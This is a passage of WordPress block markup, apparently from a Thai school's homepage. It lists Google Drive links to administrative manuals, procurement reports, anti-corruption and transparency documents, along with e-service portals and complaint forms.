data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html 